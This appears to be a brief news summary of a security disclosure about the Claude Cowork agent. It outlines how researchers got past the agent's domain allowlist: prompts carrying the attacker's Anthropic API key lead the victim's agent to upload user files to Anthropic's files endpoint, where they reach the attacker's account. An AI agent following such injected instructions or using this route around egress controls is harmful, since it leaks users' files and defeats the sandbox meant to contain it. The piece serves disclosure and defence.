Claude Cowork Exfiltrates Files

Overview

Researchers discovered a clever attack that bypasses Claude Cowork’s security protections by exploiting its trusted domain whitelist to exfiltrate user files. The attack uses the victim’s own AI agent to upload sensitive files to an attacker-controlled Anthropic account.

View Original

Key Facts

Claude Cowork restricts outbound HTTP traffic to specific domains - attackers found a way around this fundamental security control
Anthropic’s API domain is whitelisted for legitimate operations - this trusted status becomes the attack vector
Attack includes attacker’s own Anthropic API key in prompts - turns the victim’s AI agent into an unwitting accomplice
Files get uploaded to https://api.anthropic.com/v1/files endpoint - sensitive data ends up in attacker’s Anthropic account for later retrieval
Discovered by Prompt Armor security researchers - demonstrates how AI agent security assumptions can be weaponized

Why It Matters

This exposes a fundamental flaw in AI agent security design - whitelisting trusted domains creates new attack surfaces when those same domains can be controlled by malicious actors through legitimate API access.